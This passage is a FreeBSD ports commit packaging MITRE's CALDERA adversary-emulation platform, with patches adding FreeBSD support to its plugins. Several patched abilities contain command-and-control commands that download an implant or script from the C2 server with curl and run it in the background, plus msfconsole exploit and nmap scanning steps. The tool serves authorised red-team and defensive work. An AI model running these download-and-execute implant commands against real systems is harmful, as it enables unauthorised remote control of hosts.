security/caldera: New port: Automated Adversary Emulation Platform
CALDERA a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response. It is built on the MITRE ATT&CK framework and is an active research project at MITRE. The framework consists of two components: - The core system. This is the framework code, consisting of what is available in this repository. Included is an asynchronous command-and-control (C2) server with a REST API and a web interface. - Plugins. These repositories expand the core framework capabilities and providing additional functionality. Examples include agents, reporting, collections of TTPs and more.
This commit is contained in:
Jose Alonso Cardenas Marquez
parent
5493ec9d40
commit
84e20fa244
113 changed files with 3101 additions and 0 deletions
|
|
@ -62,6 +62,7 @@
|
|||
SUBDIR += bzrtp
|
||||
SUBDIR += ca_root_nss
|
||||
SUBDIR += caesarcipher
|
||||
SUBDIR += caldera
|
||||
SUBDIR += calife
|
||||
SUBDIR += cardpeek
|
||||
SUBDIR += cargo-audit
|
||||
|
|
|
|||
95
security/caldera/Makefile
Normal file
95
security/caldera/Makefile
Normal file
|
|
@ -0,0 +1,95 @@
|
|||
PORTNAME= caldera
|
||||
DISTVERSION= 4.1.0
|
||||
CATEGORIES= security python
|
||||
|
||||
MAINTAINER= acm@FreeBSD.org
|
||||
COMMENT= Automated Adversary Emulation Platform
|
||||
WWW= https://github.com/mitre/caldera
|
||||
|
||||
LICENSE= APACHE20
|
||||
LICENSE_FILE= ${WRKSRC}/LICENSE
|
||||
|
||||
RUN_DEPENDS= ${PYTHON_PKGNAMEPREFIX}aiohttp>0:www/py-aiohttp@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}aiohttp-jinja2>0:www/py-aiohttp-jinja2@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}aiohttp-session>0:www/py-aiohttp-session@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}aiohttp-security>0:security/py-aiohttp-security@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}aiohttp-apispec>0:devel/py-aiohttp-apispec@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}Jinja2>0:devel/py-Jinja2@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}yaml>0:devel/py-yaml@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}cryptography>0:security/py-cryptography@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}websockets>0:devel/py-websockets@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}sphinx>0:textproc/py-sphinx@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}docutils>0:textproc/py-docutils@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}sphinx_rtd_theme>0:textproc/py-sphinx_rtd_theme@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}myst-parser>0:textproc/py-myst-parser@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}marshmallow>0:devel/py-marshmallow@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}dirhash>0:security/py-dirhash@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}docker>0:sysutils/py-docker@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}donut-shellcode>0:devel/py-donut-shellcode@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}marshmallow-enum>0:devel/py-marshmallow-enum@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}ldap3>0:net/py-ldap3@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}lxml>0:devel/py-lxml@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}reportlab>0:print/py-reportlab@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}svglib>0:converters/py-svglib@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}markdown>0:textproc/py-markdown@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}dnspython>0:dns/py-dnspython@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}asyncssh>0:security/py-asyncssh@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}aioftp>0:ftp/py-aioftp@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}pyautogui>0:x11/py-pyautogui@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}selenium>0:www/py-selenium@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}webdriver_manager>0:www/py-webdriver_manager@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}beautifulsoup>0:www/py-beautifulsoup@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}networkx>0:math/py-networkx@${PY_FLAVOR} \
|
||||
${PYTHON_PKGNAMEPREFIX}numpy>0:math/py-numpy@${PY_FLAVOR} \
|
||||
upx>0:archivers/upx \
|
||||
git>0:devel/git \
|
||||
bash>0:shells/bash
|
||||
|
||||
USE_GITHUB= yes
|
||||
GH_ACCOUNT= mitre
|
||||
GH_PROJECT= ${PORTNAME}
|
||||
GH_TUPLE= mitre:access:fff4c20:access/plugins/access \
|
||||
mitre:atomic:9e2c958:atomic/plugins/atomic \
|
||||
mitre:builder:1aca019:builder/plugins/builder \
|
||||
mitre:compass:fb88e02:compass/plugins/compass \
|
||||
mitre:debrief:d815b60:debrief/plugins/debrief \
|
||||
mitre:emu:5dbff82:emu/plugins/emu \
|
||||
mitre:fieldmanual:510d0b9:fieldmanual/plugins/fieldmanual \
|
||||
mitre:gameboard:3d98c32:gameboard/plugins/gameboard \
|
||||
mitre:human:4368dea:human/plugins/human \
|
||||
mitre:manx:e7205ea:manx/plugins/manx \
|
||||
mitre:mock:4ea3337:mock/plugins/mock \
|
||||
mitre:response:889213a:response/plugins/response \
|
||||
mitre:sandcat:de3405f:sandcat/plugins/sandcat \
|
||||
mitre:ssl:ac5bfcb:ssl/plugins/ssl \
|
||||
mitre:stockpile:9662f27:stockpile/plugins/stockpile \
|
||||
mitre:training:e309b0f:training/plugins/training
|
||||
|
||||
USES= go:run python:3.8+
|
||||
|
||||
NO_ARCH= yes
|
||||
NO_BUILD= yes
|
||||
|
||||
USE_RC_SUBR= ${PORTNAME:S/-/_/}
|
||||
SUB_FILES= pkg-message
|
||||
SUB_LIST= PYTHON_CMD=${PYTHON_CMD} \
|
||||
WWWDIR=${WWWDIR}
|
||||
|
||||
OPTIONS_DEFINE= HAPROXY
|
||||
OPTIONS_DEFAULT=HAPROXY
|
||||
HAPROXY_DESC= Support for HTTPS
|
||||
HAPROXY_RUN_DEPENDS=haproxy18>0:net/haproxy18
|
||||
|
||||
post-extract:
|
||||
${RM} -R ${WRKSRC}/.github
|
||||
cd ${WRKSRC} && ${RM} .coveragerc .dockerignore .eslintrc.js .flake8 \
|
||||
.git* .pre* .stylelintrc.json Dockerfile
|
||||
|
||||
post-patch:
|
||||
cd ${WRKSRC} && \
|
||||
${FIND} . -type f -name "*.orig" -exec ${RM} "{}" \;
|
||||
|
||||
do-install:
|
||||
@cd ${WRKSRC} && ${COPYTREE_SHARE} . ${STAGEDIR}/${WWWDIR}
|
||||
|
||||
.include <bsd.port.mk>
|
||||
35
security/caldera/distinfo
Normal file
35
security/caldera/distinfo
Normal file
|
|
@ -0,0 +1,35 @@
|
|||
TIMESTAMP = 1681965363
|
||||
SHA256 (mitre-caldera-4.1.0_GH0.tar.gz) = 342516c29926dbd7e96bc2ba1558779d5ee423eac97a4c48d0245d7480a790eb
|
||||
SIZE (mitre-caldera-4.1.0_GH0.tar.gz) = 3462547
|
||||
SHA256 (mitre-access-fff4c20_GH0.tar.gz) = 087dd5de918c5a2a5a73888abb3839e6d43335ac5f26ee739038813631a24358
|
||||
SIZE (mitre-access-fff4c20_GH0.tar.gz) = 8485
|
||||
SHA256 (mitre-atomic-9e2c958_GH0.tar.gz) = 0fbd0c3bb2c3c621afcb8f271b76df0f6ac2bacd72a7f8d9771c94b9a3f5d085
|
||||
SIZE (mitre-atomic-9e2c958_GH0.tar.gz) = 15142
|
||||
SHA256 (mitre-builder-1aca019_GH0.tar.gz) = 563c54beed985b11edb96c7ec3a8349f8328a6534750801fa71693ed1cf34346
|
||||
SIZE (mitre-builder-1aca019_GH0.tar.gz) = 7946
|
||||
SHA256 (mitre-compass-fb88e02_GH0.tar.gz) = 6187446551f4041ac0a0c33689b4a62a39a02b285d988bd6f17647d89d98ce16
|
||||
SIZE (mitre-compass-fb88e02_GH0.tar.gz) = 5907
|
||||
SHA256 (mitre-debrief-d815b60_GH0.tar.gz) = 565e234e52157b6259752c474c40eaa96f15921595f299cbd7875f4bc51e73aa
|
||||
SIZE (mitre-debrief-d815b60_GH0.tar.gz) = 4419572
|
||||
SHA256 (mitre-emu-5dbff82_GH0.tar.gz) = 45b980caf2b9a59d1d9f4bba69334e1b74f036ae667bc510dfc1422ef58829d9
|
||||
SIZE (mitre-emu-5dbff82_GH0.tar.gz) = 16962
|
||||
SHA256 (mitre-fieldmanual-510d0b9_GH0.tar.gz) = d908a6f0eb4bf8295bc6c92e23aae5984bcd2006069af9ed880978b76c7c0984
|
||||
SIZE (mitre-fieldmanual-510d0b9_GH0.tar.gz) = 7811262
|
||||
SHA256 (mitre-gameboard-3d98c32_GH0.tar.gz) = 8415bbbc64fe78836afea2e364fe655cc364a5d70dcf3fbcb748617fc9b9ad0a
|
||||
SIZE (mitre-gameboard-3d98c32_GH0.tar.gz) = 14753
|
||||
SHA256 (mitre-human-4368dea_GH0.tar.gz) = 4710f3d6c7b3f728274187c36cda53232b3609d8177ccad6b1968ae99d83724a
|
||||
SIZE (mitre-human-4368dea_GH0.tar.gz) = 22846
|
||||
SHA256 (mitre-manx-e7205ea_GH0.tar.gz) = 5b39a00ff8bbe7b20d4cfcab6161edbbafd94fa9bd62af4741975f7759f7a470
|
||||
SIZE (mitre-manx-e7205ea_GH0.tar.gz) = 7352820
|
||||
SHA256 (mitre-mock-4ea3337_GH0.tar.gz) = 36447c30cdff3869796948bff8940b24e710f242e70255578095a10df4d0c5db
|
||||
SIZE (mitre-mock-4ea3337_GH0.tar.gz) = 5470
|
||||
SHA256 (mitre-response-889213a_GH0.tar.gz) = 4067efd0c4bddeed799255838a80316d96ba0c4cac84625d7d0257e44c00c4ee
|
||||
SIZE (mitre-response-889213a_GH0.tar.gz) = 24463
|
||||
SHA256 (mitre-sandcat-de3405f_GH0.tar.gz) = dbb111552220d6f108f852f3d442dcc90d3457c488fbec3f176a4638a611cd56
|
||||
SIZE (mitre-sandcat-de3405f_GH0.tar.gz) = 7564017
|
||||
SHA256 (mitre-ssl-ac5bfcb_GH0.tar.gz) = 01067db5fe9a32d07d13bbea4ffb6f3bd2907a57f2d50a7c7e9c5f2bdc823a12
|
||||
SIZE (mitre-ssl-ac5bfcb_GH0.tar.gz) = 6395
|
||||
SHA256 (mitre-stockpile-9662f27_GH0.tar.gz) = ab74994666c6759261346bb0c7a653dde5982273d04afd18eb26e7d57c78210c
|
||||
SIZE (mitre-stockpile-9662f27_GH0.tar.gz) = 4777470
|
||||
SHA256 (mitre-training-e309b0f_GH0.tar.gz) = 505d4d4447c9d35e2062064abe1d689f7bc92c818ccb450848e6e57619c24375
|
||||
SIZE (mitre-training-e309b0f_GH0.tar.gz) = 492099
|
||||
84
security/caldera/files/caldera.in
Normal file
84
security/caldera/files/caldera.in
Normal file
|
|
@ -0,0 +1,84 @@
|
|||
#!/bin/sh
|
||||
|
||||
# PROVIDE: caldera
|
||||
# REQUIRE: NETWORKING
|
||||
# KEYWORD: shutdown
|
||||
#
|
||||
# Configuration settings for caldera in /etc/rc.conf:
|
||||
#
|
||||
# caldera_enable: run caldera as service (default=NO)
|
||||
# caldera_flags: additional flags for caldera server
|
||||
#
|
||||
|
||||
. /etc/rc.subr
|
||||
|
||||
name=caldera
|
||||
rcvar=caldera_enable
|
||||
|
||||
load_rc_config ${name}
|
||||
|
||||
export PATH="${PATH}:/usr/local/bin:/usr/local/sbin"
|
||||
|
||||
: ${caldera_enable:=NO}
|
||||
: ${caldera_flags="--insecure"}
|
||||
|
||||
caldera_user="www"
|
||||
|
||||
pidfile="/var/run/${name}.pid"
|
||||
|
||||
caldera_wwwdir="%%WWWDIR%%"
|
||||
python_command="%%PYTHON_CMD%%"
|
||||
python_script="${caldera_wwwdir}/server.py"
|
||||
start_cmd=${name}_start
|
||||
status_cmd=${name}_status
|
||||
stop_cmd=${name}_stop
|
||||
restart_cmd=${name}_restart
|
||||
extra_commands="status"
|
||||
|
||||
caldera_start()
|
||||
{
|
||||
if [ ! -f ${pidfile} ]
|
||||
then
|
||||
cd ${caldera_wwwdir} && \
|
||||
daemon -u ${caldera_user} -p ${pidfile} -t ${name} -o /var/log/caldera.log \
|
||||
${python_command} ${python_script} \
|
||||
${caldera_flags}
|
||||
|
||||
echo "Starting ${name}"
|
||||
else
|
||||
echo "${name} is running as pid" `cat ${pidfile}`
|
||||
fi
|
||||
}
|
||||
|
||||
caldera_status()
|
||||
{
|
||||
# If running, show pid
|
||||
if [ -f ${pidfile} ]
|
||||
then
|
||||
echo "${name} is running as pid" `cat ${pidfile}`
|
||||
else
|
||||
echo "${name} is not running"
|
||||
fi
|
||||
}
|
||||
|
||||
caldera_stop()
|
||||
{
|
||||
if [ -f ${pidfile} ]
|
||||
then
|
||||
kill `cat ${pidfile}`
|
||||
rm ${pidfile}
|
||||
echo "Stopping ${name}"
|
||||
else
|
||||
echo "${name} not running? (check ${pidfile})."
|
||||
fi
|
||||
}
|
||||
|
||||
caldera_restart()
|
||||
{
|
||||
echo "Performing restart ${name}"
|
||||
caldera_stop
|
||||
sleep 3
|
||||
caldera_start
|
||||
}
|
||||
|
||||
run_rc_command "$1"
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml.orig 2021-10-01 14:07:40 UTC
|
||||
+++ plugins/access/data/abilities/build-capabilities/bed8f28e-c0ed-463e-9e31-d5607e5473df.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: Build or acquire exploits
|
||||
attack_id: T1349
|
||||
platforms:
|
||||
- darwin,linux:
|
||||
+ darwin,freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
msfconsole -r msf_extract.rc #{app.contact.http} #{app.api_key.red}
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml.orig 2021-10-01 14:07:40 UTC
|
||||
+++ plugins/access/data/abilities/technical-information-gathering/567eaaba-94cc-4a27-83f8-768e5638f4e1.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: Conduct active scanning
|
||||
attack_id: T1254
|
||||
platforms:
|
||||
- darwin,linux:
|
||||
+ darwin,freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
./scanner.sh #{target.ip}
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/access/data/payloads/scanner.sh.orig 2021-10-01 14:07:40 UTC
|
||||
+++ plugins/access/data/payloads/scanner.sh
|
||||
@@ -1,5 +1,5 @@
|
||||
-#!/bin/bash
|
||||
+#!/bin/sh
|
||||
|
||||
echo '[+] Starting basic NMAP scan'
|
||||
nmap -Pn $1
|
||||
-echo '[+] Complete with module'
|
||||
\ No newline at end of file
|
||||
+echo '[+] Complete with module'
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/atomic/app/atomic_svc.py.orig 2022-08-11 15:59:49 UTC
|
||||
+++ plugins/atomic/app/atomic_svc.py
|
||||
@@ -13,7 +13,7 @@ from app.utility.base_world import BaseWorld
|
||||
from app.utility.base_service import BaseService
|
||||
from app.objects.c_agent import Agent
|
||||
|
||||
-PLATFORMS = dict(windows='windows', macos='darwin', linux='linux')
|
||||
+PLATFORMS = dict(windows='windows', macos='darwin', linux='linux', freebsd='freebsd')
|
||||
EXECUTORS = dict(command_prompt='cmd', sh='sh', powershell='psh', bash='sh')
|
||||
RE_VARIABLE = re.compile('(#{(.*?)})', re.DOTALL)
|
||||
PREFIX_HASH_LEN = 6
|
||||
11
security/caldera/files/patch-plugins_emu_app_emu__svc.py
Normal file
11
security/caldera/files/patch-plugins_emu_app_emu__svc.py
Normal file
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/emu/app/emu_svc.py.orig 2022-06-12 20:12:01 UTC
|
||||
+++ plugins/emu/app/emu_svc.py
|
||||
@@ -12,7 +12,7 @@ from app.utility.base_service import BaseService
|
||||
|
||||
|
||||
class EmuService(BaseService):
|
||||
- _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows'}
|
||||
+ _dynamicically_compiled_payloads = {'sandcat.go-linux', 'sandcat.go-darwin', 'sandcat.go-windows', 'sandcat.go-freebsd'}
|
||||
|
||||
def __init__(self):
|
||||
self.log = self.add_service('emu_svc', self)
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/gameboard/app/gameboard_api.py.orig 2021-12-22 15:33:52 UTC
|
||||
+++ plugins/gameboard/app/gameboard_api.py
|
||||
@@ -244,7 +244,7 @@ class GameboardApi(BaseService):
|
||||
reference_ability = (await self.data_svc.locate('abilities', match=dict(ability_id='bf565e6a-0037-4aa4-852f-1afa222c76db')))[0] #TODO: replace
|
||||
ability_id = str(uuid.uuid4())
|
||||
executors = []
|
||||
- for pl in ['windows', 'darwin', 'linux']:
|
||||
+ for pl in ['windows', 'darwin', 'linux', 'freebsd']:
|
||||
reference_executor = reference_ability.find_executor('elasticsearch', pl)
|
||||
if not reference_executor:
|
||||
continue
|
||||
|
|
@ -0,0 +1,40 @@
|
|||
--- plugins/human/templates/human.html.orig 2022-09-06 17:33:12 UTC
|
||||
+++ plugins/human/templates/human.html
|
||||
@@ -60,6 +60,7 @@
|
||||
<select id="base-platform">
|
||||
<option disabled="disabled" selected="">Select target OS</option>
|
||||
<option value="darwin">MacOS</option>
|
||||
+ <option value="freebsd">FreeBSD</option>
|
||||
<option value="linux">Linux</option>
|
||||
<option value="windows-psh">Windows (PowerShell)</option>
|
||||
</select>
|
||||
@@ -257,6 +258,11 @@
|
||||
' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
|
||||
'--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
|
||||
break;
|
||||
+ case "freebsd":
|
||||
+ baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
|
||||
+ ' && virtualenv -p python3.9 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
|
||||
+ '--taskinterval '+taskInterval+' --taskgroupinterval '+taskClusterInterval+' --extra '+extra;
|
||||
+ break;
|
||||
case "linux":
|
||||
baseHuman = 'curl -sk -o \''+humanName+'.tar.gz\' -X POST -H \'file:'+humanName+'.tar.gz\' '+http+'/file/download 2>&1 && mkdir \''+humanName+'\' && tar -C \''+humanName+'\' -zxvf \''+humanName+'.tar.gz\' ' +
|
||||
' && virtualenv -p python3 \''+humanName+'\' && \''+humanName+'/bin/pip\' install -r \''+humanName+'/requirements.txt\' && \''+humanName+'/bin/python\' \''+humanName+'/human.py\' --clustersize '+taskCount+' ' +
|
||||
@@ -293,6 +299,10 @@
|
||||
$.each(extra, function(i, command) {
|
||||
switch (platform) {
|
||||
case "darwin":
|
||||
+ command = command.replace(/\\/g, '\\\\');
|
||||
+ command = command.replace(/"/g, '\\\"');
|
||||
+ break;
|
||||
+ case "freebsd":
|
||||
command = command.replace(/\\/g, '\\\\');
|
||||
command = command.replace(/"/g, '\\\"');
|
||||
break;
|
||||
@@ -317,4 +327,4 @@
|
||||
return provided_value || default_value;
|
||||
}
|
||||
|
||||
-</script>
|
||||
\ No newline at end of file
|
||||
+</script>
|
||||
|
|
@ -0,0 +1,33 @@
|
|||
--- plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml.orig 2022-08-08 23:34:48 UTC
|
||||
+++ plugins/manx/data/abilities/command-and-control/356d1722-7784-40c4-822b-0cf864b0b36d.yml
|
||||
@@ -57,6 +57,30 @@
|
||||
contact="tcp";
|
||||
agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:linux" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
|
||||
nohup ./$agent -http $server -socket $socket -contact $contact &
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ socket="#{app.contact.tcp}";
|
||||
+ contact="tcp";
|
||||
+ curl -s -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download > #{agents.implant_name};
|
||||
+ chmod +x #{agents.implant_name};
|
||||
+ ./#{agents.implant_name} -http $server -socket $socket -contact $contact -v
|
||||
+ variations:
|
||||
+ - description: Run against the UDP contact
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ socket="#{app.contact.udp}";
|
||||
+ contact="udp";
|
||||
+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
|
||||
+ nohup ./$agent -http $server -socket $socket -contact $contact &
|
||||
+ - description: Download with a random name and start as a background process
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ socket="#{app.contact.tcp}";
|
||||
+ contact="tcp";
|
||||
+ agent=$(curl -svkOJ -X POST -H "file:manx.go" -H "platform:freebsd" $server/file/download 2>&1 | grep -i "Content-Disposition" | grep -io "filename=.*" | cut -d'=' -f2 | tr -d '"\r') && chmod +x $agent 2>/dev/null;
|
||||
+ nohup ./$agent -http $server -socket $socket -contact $contact &
|
||||
windows:
|
||||
psh:
|
||||
command: |
|
||||
12
security/caldera/files/patch-plugins_manx_update-shells.sh
Normal file
12
security/caldera/files/patch-plugins_manx_update-shells.sh
Normal file
|
|
@ -0,0 +1,12 @@
|
|||
--- plugins/manx/update-shells.sh.orig 2022-08-08 23:34:48 UTC
|
||||
+++ plugins/manx/update-shells.sh
|
||||
@@ -1,7 +1,8 @@
|
||||
-#!/bin/bash
|
||||
+#!/bin/sh
|
||||
cwd=$(pwd)
|
||||
cd shells
|
||||
GOOS=windows go build -o ../payloads/manx.go-windows -ldflags="-s -w" manx.go
|
||||
GOOS=linux go build -o ../payloads/manx.go-linux -ldflags="-s -w" manx.go
|
||||
GOOS=darwin go build -o ../payloads/manx.go-darwin -ldflags="-s -w" manx.go
|
||||
+GOOS=freebsd go build -o ../payloads/manx.go-freebsd -ldflags="-s -w" manx.go
|
||||
cd $cwd
|
||||
|
|
@ -0,0 +1,15 @@
|
|||
--- plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/command-and-control/1837b43e-4fff-46b2-a604-a602f7540469.yml
|
||||
@@ -24,3 +24,12 @@
|
||||
python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
|
||||
cleanup: |
|
||||
pkill -f elasticat
|
||||
+ freebsd:
|
||||
+ sh:
|
||||
+ command: |
|
||||
+ server="#{app.contact.http}";
|
||||
+ curl -s -X POST -H "file:elasticat.py" -H "platform:freebsd" $server/file/download > elasticat.py;
|
||||
+ pip install requests;
|
||||
+ python elasticat.py --server=$server --es-host="http://127.0.0.1:9200" --group=blue --minutes-since=60
|
||||
+ cleanup: |
|
||||
+ pkill -f elasticat
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/detection/1226f8ec-e2e5-4311-88e7-378c0e5cc7ce.yml
|
||||
@@ -9,7 +9,7 @@
|
||||
name: x
|
||||
repeatable: True
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
find /var/mail -type f -exec grep "From.*@.*\..*" {} \; | cut -d'@' -f2 | cut -d' ' -f1 | sort --uniq
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/detection/3b4640bc-eacb-407a-a997-105e39788781.yml
|
||||
@@ -17,7 +17,7 @@
|
||||
- source: remote.port.unauthorized
|
||||
edge: has_pid
|
||||
target: host.pid.unauthorized
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
ps aux | grep -v grep | grep #{remote.port.unauthorized} | awk '{print $2}'
|
||||
@@ -34,4 +34,4 @@
|
||||
plugins.response.app.parsers.process:
|
||||
- source: remote.port.unauthorized
|
||||
edge: has_pid
|
||||
- target: host.pid.unauthorized
|
||||
\ No newline at end of file
|
||||
+ target: host.pid.unauthorized
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/detection/930236c2-5397-4868-8c7b-72e294a5a376.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: True
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
filepath="#{file.sensitive.path}";
|
||||
@@ -46,4 +46,4 @@
|
||||
edge: has_hash
|
||||
target: file.sensitive.hash
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: file.sensitive.hash
|
||||
\ No newline at end of file
|
||||
+ - source: file.sensitive.hash
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/detection/9bc10f37-0853-4d73-b547-019c11eda22f.yml
|
||||
@@ -7,7 +7,7 @@
|
||||
name: x
|
||||
repeatable: True
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
directory="#{directory.sensitive.path}";
|
||||
@@ -68,4 +68,4 @@
|
||||
edge: has_hash
|
||||
target: directory.sensitive.hash
|
||||
- plugins.stockpile.app.requirements.paw_provenance:
|
||||
- - source: directory.sensitive.hash
|
||||
\ No newline at end of file
|
||||
+ - source: directory.sensitive.hash
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/detection/ee54384f-cfbc-4228-9dc1-cc5632307afb.yml
|
||||
@@ -8,7 +8,7 @@
|
||||
name: x
|
||||
repeatable: True
|
||||
platforms:
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
sh:
|
||||
command: |
|
||||
set -f;
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/elastic_hunting/4b283acc-45c0-4de8-b0ac-ac0699e5ab95.yml
|
||||
@@ -28,7 +28,7 @@
|
||||
- source: host.process.guid
|
||||
edge: has_interesting
|
||||
target: investigate.process.guid
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
elasticsearch:
|
||||
*cmd
|
||||
darwin:
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/elastic_hunting/b419604e-6f82-40a4-b215-12f8c8156c2f.yml
|
||||
@@ -25,7 +25,7 @@
|
||||
- source: host.process.guid
|
||||
edge: has_interesting
|
||||
target: investigate.process.parent_guid
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
elasticsearch:
|
||||
*cmd
|
||||
darwin:
|
||||
|
|
@ -0,0 +1,11 @@
|
|||
--- plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml.orig 2021-10-13 20:41:40 UTC
|
||||
+++ plugins/response/data/abilities/elastic_hunting/bf565e6a-0037-4aa4-852f-1afa222c76db.yml
|
||||
@@ -22,7 +22,7 @@
|
||||
- source: host.process.guid
|
||||
edge: has_interesting
|
||||
target: investigate.process.guid
|
||||
- linux:
|
||||
+ freebsd,linux:
|
||||
elasticsearch:
|
||||
*cmd
|
||||
darwin:
|
||||
|
|
@ -0,0 +1,18 @@
|
|||
--- plugins/response/data/abilities/response/02fb7fa9-8886-4330-9e65-fa7bb1bc5271.yml.orig 2021-10-13 20:41:40 UTC
|
||||
